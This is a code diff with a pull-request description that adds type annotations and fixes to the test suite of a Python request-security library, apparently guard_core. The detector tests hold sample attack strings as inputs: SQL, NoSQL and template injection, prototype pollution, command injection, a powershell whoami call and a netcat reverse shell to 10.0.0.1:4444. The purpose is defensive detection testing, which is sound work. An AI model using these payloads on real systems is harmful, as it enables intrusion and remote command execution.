     mock_ban_manager.is_ip_banned = MagicMock(return_value=False)
     cfg = SecurityConfig()
     cfg.passive_mode = False
-    cfg.block_cloud_providers = ["AWS"]
+    cfg.block_cloud_providers = {"AWS"}
     rc = RouteConfig()
     rc.ip_whitelist = ["1.2.3.4"]
     req = _req(rc)

--- a/tests/test_sync/test_detection_singleton_configuration.py
+++ b/tests/test_sync/test_detection_singleton_configuration.py
@@ -31,7 +31,8 @@ def test_initialize_configures_detection_from_config(
 ) -> None:
     handler = fresh_legacy_singleton
     assert handler._threat_score_threshold == 1.0
-    assert handler._compiler is None
+    compiler_before = handler._compiler
+    assert compiler_before is None
 
     config = SecurityConfig(detection_threat_score_threshold=2.5)
     initializer = HandlerInitializer(config=config)

--- a/tests/test_sync/test_dynamic_rule_atomicity.py
+++ b/tests/test_sync/test_dynamic_rule_atomicity.py
@@ -29,7 +29,7 @@ def reset_singleton() -> Generator[None, None, None]:
 
 def test_apply_rules_rolls_back_on_partial_failure() -> None:
     config = SecurityConfig()
-    config.blocked_countries = ["XX"]
+    config.blocked_countries = frozenset({"XX"})
     manager = DynamicRuleManager(config)
 
     rules = _rules(blocked_countries=["NEW"])
@@ -40,7 +40,7 @@ def test_apply_rules_rolls_back_on_partial_failure() -> None:
         with pytest.raises(RuntimeError, match="kaboom"):
             manager._apply_rules(rules)
 
-    assert config.blocked_countries == ["XX"]
+    assert config.blocked_countries == frozenset({"XX"})
 
 
 def test_apply_rules_persists_on_success() -> None:
@@ -90,7 +90,7 @@ def test_rollback_restores_all_snapshot_fields() -> None:
         rate_limit=100,
         enable_ip_banning=True,
     )
-    config.blocked_countries = ["OLD"]
+    config.blocked_countries = frozenset({"OLD"})
     manager = DynamicRuleManager(config)
 
     rules = _rules(
@@ -107,6 +107,6 @@ def test_rollback_restores_all_snapshot_fields() -> None:
         with pytest.raises(RuntimeError):
             manager._apply_rules(rules)
 
-    assert config.blocked_countries == ["OLD"]
+    assert config.blocked_countries == frozenset({"OLD"})
     assert config.rate_limit == 100
     assert config.enable_ip_banning is True

--- a/tests/test_sync/test_models/test_models.py
+++ b/tests/test_sync/test_models/test_models.py
@@ -78,11 +78,11 @@ class ValidGeoIPHandler:
 def test_geo_ip_handler_validation() -> None:
     ipinfo = IPInfoManager(token="test")
     config = SecurityConfig(geo_ip_handler=ipinfo)
-    assert config.geo_ip_handler == ipinfo
+    assert cast(IPInfoManager, config.geo_ip_handler) is ipinfo
 
     valid_instance = ValidGeoIPHandler()
     config = SecurityConfig(geo_ip_handler=valid_instance)
-    assert config.geo_ip_handler == valid_instance
+    assert cast(ValidGeoIPHandler, config.geo_ip_handler) is valid_instance
 
     config = SecurityConfig(geo_ip_handler=None)
     assert config.geo_ip_handler is None

--- a/tests/test_sync/test_models/test_security_config_country_lists.py
+++ b/tests/test_sync/test_models/test_security_config_country_lists.py
@@ -1,3 +1,5 @@
+from pathlib import Path
+
 import pytest
 
 from guard_core.models import SecurityConfig
@@ -15,7 +17,7 @@ def test_whitelist_countries_default_is_empty_frozenset() -> None:
     assert isinstance(config.whitelist_countries, frozenset)
 
 
-def test_blocked_countries_accepts_list_input(tmp_path) -> None:
+def test_blocked_countries_accepts_list_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=["us", "FR"],
         ipinfo_token="dummy",
@@ -24,7 +26,7 @@ def test_blocked_countries_accepts_list_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_set_input(tmp_path) -> None:
+def test_blocked_countries_accepts_set_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries={"us", "fr"},
         ipinfo_token="dummy",
@@ -33,7 +35,7 @@ def test_blocked_countries_accepts_set_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_tuple_input(tmp_path) -> None:
+def test_blocked_countries_accepts_tuple_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=("us", "fr"),
         ipinfo_token="dummy",
@@ -42,7 +44,7 @@ def test_blocked_countries_accepts_tuple_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_frozenset_input(tmp_path) -> None:
+def test_blocked_countries_accepts_frozenset_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=frozenset({"us", "fr"}),
         ipinfo_token="dummy",
@@ -68,7 +70,7 @@ def test_whitelist_countries_none_coerces_to_empty_frozenset() -> None:
     assert isinstance(config.whitelist_countries, frozenset)
 
 
-def test_whitelist_countries_normalizes_case(tmp_path) -> None:
+def test_whitelist_countries_normalizes_case(tmp_path: Path) -> None:
     config = SecurityConfig(
         whitelist_countries=["us", "Gb", "DE"],
         ipinfo_token="dummy",

--- a/tests/test_sync/test_sus_patterns/test_anomaly_scoring.py
+++ b/tests/test_sync/test_sus_patterns/test_anomaly_scoring.py
@@ -9,7 +9,7 @@ from guard_core.sync.handlers.suspatterns_handler import (
 )
 
 
-def test_threshold_field_default_and_bounds():
+def test_threshold_field_default_and_bounds() -> None:
     assert SecurityConfig().detection_threat_score_threshold == 1.0
     raised = SecurityConfig(detection_threat_score_threshold=2.5)
     assert raised.detection_threat_score_threshold == 2.5
@@ -17,12 +17,14 @@ def test_threshold_field_default_and_bounds():
         SecurityConfig(detection_threat_score_threshold=-1.0)
 
 
-def test_resolve_weight_defaults_to_category_one():
+def test_resolve_weight_defaults_to_category_one() -> None:
     assert _resolve_pattern_weight(r"some-pattern", "sqli") == 1.0
     assert DETECTION_CATEGORY_WEIGHTS["sqli"] == 1.0
 
 
-def test_regex_threat_dict_carries_weight(sus_patterns_manager_with_detection):
+def test_regex_threat_dict_carries_weight(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     result = sus_patterns_manager_with_detection.detect(
         "<script>alert(1)</script>", "127.0.0.1", context="unknown"
     )
@@ -32,8 +34,8 @@ def test_regex_threat_dict_carries_weight(sus_patterns_manager_with_detection):
 
 
 def test_single_match_still_flagged_at_default_threshold(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     result = sus_patterns_manager_with_detection.detect(
         "<script>alert(1)</script>", "127.0.0.1", context="unknown"
     )
@@ -41,7 +43,7 @@ def test_single_match_still_flagged_at_default_threshold(
     assert result["threat_score"] == 1.0
 
 
-def test_threshold_gate_suppresses_below_threshold():
+def test_threshold_gate_suppresses_below_threshold() -> None:
     SusPatternsManager._instance = None
     SusPatternsManager._config = None
     config = SecurityConfig(detection_threat_score_threshold=2.0)

--- a/tests/test_sync/test_sus_patterns/test_compiler.py
+++ b/tests/test_sync/test_sus_patterns/test_compiler.py
@@ -290,7 +290,9 @@ def test_clear_cache_thread_safety(compiler: PatternCompiler) -> None:
     def clear_task() -> None:
         compiler.clear_cache()
 
-    [compile_task(), clear_task()]
+    compile_task()
+
+    clear_task()
 
     assert len(compiler._compiled_cache) == len(compiler._cache_order)
 

--- a/tests/test_sync/test_sus_patterns/test_fp_reduction.py
+++ b/tests/test_sync/test_sus_patterns/test_fp_reduction.py
@@ -1,76 +1,105 @@
-def _flagged(manager, payload: str) -> bool:
+from guard_core.sync.handlers.suspatterns_handler import SusPatternsManager
+
+
+def _flagged(manager: SusPatternsManager, payload: str) -> bool:
     result = manager.detect(payload, "127.0.0.1", context="unknown")
-    return result["is_threat"]
+    return bool(result["is_threat"])
 
 
-def test_select_star_still_flagged(sus_patterns_manager_with_detection):
+def test_select_star_still_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(sus_patterns_manager_with_detection, "SELECT * FROM users")
 
 
-def test_select_where_still_flagged(sus_patterns_manager_with_detection):
+def test_select_where_still_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(
         sus_patterns_manager_with_detection, "SELECT password FROM users WHERE id=1"
     )
 
 
-def test_select_prose_not_flagged(sus_patterns_manager_with_detection):
+def test_select_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         "I'll select a few items from the catalog for you",
     )
 
 
-def test_select_candidates_prose_not_flagged(sus_patterns_manager_with_detection):
+def test_select_candidates_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         "we will select candidates from the applicant pool",
     )
 
 
-def test_order_by_attack_flagged(sus_patterns_manager_with_detection):
+def test_order_by_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(sus_patterns_manager_with_detection, "1' ORDER BY 1--")
 
 
-def test_order_by_prose_not_flagged(sus_patterns_manager_with_detection):
+def test_order_by_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         "sort the results, order by 1 ascending then by name",
     )
 
 
-def test_ddl_attack_flagged(sus_patterns_manager_with_detection):
+def test_ddl_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(sus_patterns_manager_with_detection, "'; DROP TABLE users;--")
 
 
-def test_ddl_prose_not_flagged(sus_patterns_manager_with_detection):
+def test_ddl_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         "drop table 7 is reserved for the wedding party",
     )
 
 
-def test_erb_attack_flagged(sus_patterns_manager_with_detection):
+def test_erb_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(sus_patterns_manager_with_detection, "<%= 7*7 %>")
 
 
-def test_erb_docs_not_flagged(sus_patterns_manager_with_detection):
+def test_erb_docs_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         "render <%= @user.name %> inside your erb view",
     )
 
 
-def test_nosql_where_op_flagged(sus_patterns_manager_with_detection):
+def test_nosql_where_op_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(
         sus_patterns_manager_with_detection, '{"$where": "this.password.length > 0"}'
     )
 
 
-def test_nosql_ne_null_flagged(sus_patterns_manager_with_detection):
+def test_nosql_ne_null_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _flagged(sus_patterns_manager_with_detection, '{"$ne":null}')
 
 
-def test_nosql_legit_value_not_flagged(sus_patterns_manager_with_detection):
+def test_nosql_legit_value_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _flagged(
         sus_patterns_manager_with_detection,
         'the mongo filter {"$gt": 5} returns larger values',

--- a/tests/test_sync/test_sus_patterns/test_phase_b_recall.py
+++ b/tests/test_sync/test_sus_patterns/test_phase_b_recall.py
@@ -1,112 +1,153 @@
-def _detected(manager, payload: str) -> bool:
+from guard_core.sync.handlers.suspatterns_handler import SusPatternsManager
+
+
+def _detected(manager: SusPatternsManager, payload: str) -> bool:
     result = manager.detect(payload, "127.0.0.1", context="unknown")
-    return result["is_threat"]
+    return bool(result["is_threat"])
 
 
-def test_comment_between_keywords_detected(sus_patterns_manager_with_detection):
+def test_comment_between_keywords_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "SELECT/**/FROM/**/users")
 
 
-def test_comment_inside_keyword_detected(sus_patterns_manager_with_detection):
+def test_comment_inside_keyword_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(
         sus_patterns_manager_with_detection, "SEL/**/ECT password FROM users"
     )
 
 
-def test_mysql_version_comment_detected(sus_patterns_manager_with_detection):
+def test_mysql_version_comment_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "1' /*!50000OR*/ '1'='1")
 
 
-def test_quote_flanked_comment_detected(sus_patterns_manager_with_detection):
+def test_quote_flanked_comment_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "1'/**/OR/**/'1'='1")
 
 
-def test_benign_css_comment_not_flagged(sus_patterns_manager_with_detection):
+def test_benign_css_comment_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _detected(
         sus_patterns_manager_with_detection,
         "color: red; /* main theme */ font-size: 14px",
     )
 
 
-def test_stacked_ddl_detected(sus_patterns_manager_with_detection):
+def test_stacked_ddl_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "'; DROP TABLE users;--")
 
 
-def test_order_by_enumeration_detected(sus_patterns_manager_with_detection):
+def test_order_by_enumeration_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "1' ORDER BY 1--")
 
 
-def test_benign_order_prose_not_flagged(sus_patterns_manager_with_detection):
+def test_benign_order_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _detected(
         sus_patterns_manager_with_detection,
         "please order by phone or email when you can",
     )
 
 
-def test_quoted_nosql_gt_detected(sus_patterns_manager_with_detection):
+def test_quoted_nosql_gt_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, '{"$gt":""}')
 
 
-def test_quoted_nosql_ne_detected(sus_patterns_manager_with_detection):
+def test_quoted_nosql_ne_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, '{"$ne":null}')
 
 
 def test_benign_json_dollar_value_not_flagged(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _detected(
         sus_patterns_manager_with_detection, '{"price":"$25","name":"coffee"}'
     )
 
 
-def test_erb_ssti_detected(sus_patterns_manager_with_detection):
+def test_erb_ssti_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "<%= 7*7 %>")
 
 
-def test_ognl_ssti_detected(sus_patterns_manager_with_detection):
+def test_ognl_ssti_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(
         sus_patterns_manager_with_detection,
         "${@java.lang.Runtime@getRuntime().exec('id')}",
     )
 
 
-def test_dollar_brace_math_detected(sus_patterns_manager_with_detection):
+def test_dollar_brace_math_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "${7*7}")
 
 
-def test_benign_shell_var_not_flagged(sus_patterns_manager_with_detection):
+def test_benign_shell_var_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _detected(sus_patterns_manager_with_detection, "export PATH=${HOME}/bin")
 
 
-def test_netcat_pipe_revshell_detected(sus_patterns_manager_with_detection):
+def test_netcat_pipe_revshell_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(
         sus_patterns_manager_with_detection, "|(nc -e /bin/sh 10.0.0.1 4444)"
     )
 
 
-def test_bare_separator_command_detected(sus_patterns_manager_with_detection):
+def test_bare_separator_command_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "test;ls")
 
 
 def test_fullwidth_semicolon_command_detected(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(sus_patterns_manager_with_detection, "test；ls")
 
 
-def test_benign_semicolon_text_not_flagged(sus_patterns_manager_with_detection):
+def test_benign_semicolon_text_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not _detected(
         sus_patterns_manager_with_detection, "first do this; then enjoy your day"
     )
 
 
-def test_prototype_pollution_detected(sus_patterns_manager_with_detection):
+def test_prototype_pollution_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(
         sus_patterns_manager_with_detection, '{"__proto__":{"isAdmin":true}}'
     )
 
 
-def test_dotnet_process_start_detected(sus_patterns_manager_with_detection):
+def test_dotnet_process_start_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert _detected(
         sus_patterns_manager_with_detection,
         'System.Diagnostics.Process.Start("powershell","-c whoami")',

--- a/tests/test_sync/test_utils/test_request_checks.py
+++ b/tests/test_sync/test_utils/test_request_checks.py
@@ -190,7 +190,7 @@ def test_whitelisted_country(
     mock_ipinfo.get_country.return_value = "US"
     mock_ipinfo.reader = True
 
-    security_config.whitelist_countries = ["US"]
+    security_config.whitelist_countries = frozenset({"US"})
 
     assert not check_ip_country("8.8.8.8", security_config, mock_ipinfo)
 

--- a/tests/test_utils/test_request_checks.py
+++ b/tests/test_utils/test_request_checks.py
@@ -192,7 +192,7 @@ async def test_whitelisted_country(
     mock_ipinfo.get_country.return_value = "US"
     mock_ipinfo.reader = True
 
-    security_config.whitelist_countries = ["US"]
+    security_config.whitelist_countries = frozenset({"US"})
 
     assert not await check_ip_country("8.8.8.8", security_config, mock_ipinfo)
 


### PR DESCRIPTION
`make quality` was red on ~141 pre-existing mypy errors in tests/ (missing annotations, list-vs-frozenset assignment, unreachable statements) plus a generator bug in scripts/unasync.py. CI (pre-commit `mypy guard_core`) was already green; this clears the stricter local `make quality` gate.

Root-cause fixes, no `# type: ignore` / `# noqa` / `# nosec`:
- Missing `-> None` / param annotations across attack_simulation, sus_patterns, models, country-list tests; `bool(result[...])` around Any-returning helpers.
- list-vs-frozenset assignment in test_dynamic_rule_atomicity, test_route_whitelist_scope, test_request_checks. test_dynamic_rule_atomicity was assigning a list to a frozenset[str] field (bypassing pydantic validation) and asserting frozenset == list (statically always-False); both sides now frozenset, so the rollback assertion is honest.
- scripts/unasync.py: the asyncio.gather -> list((a(), b())) substitution emitted a list of None-returning calls (func-returns-value); emit two bare statements instead. Sync mirrors regenerated.
- test_runner sentinel: object() on a SusPatternsManager | None field was a type violation; use a real SusPatternsManager sentinel with reset().
- test_models: cast(IPInfoManager, config.geo_ip_handler) is ipinfo (genuine narrowing; == upgraded to is).
- otel integration test restructured so the unasync'd requests.Session mirror is valid.

Gates: `make quality` green (mypy 537 files, ruff, vulture, radon, xenon), `make check-sync` green, 4246 passed / 2 deselected.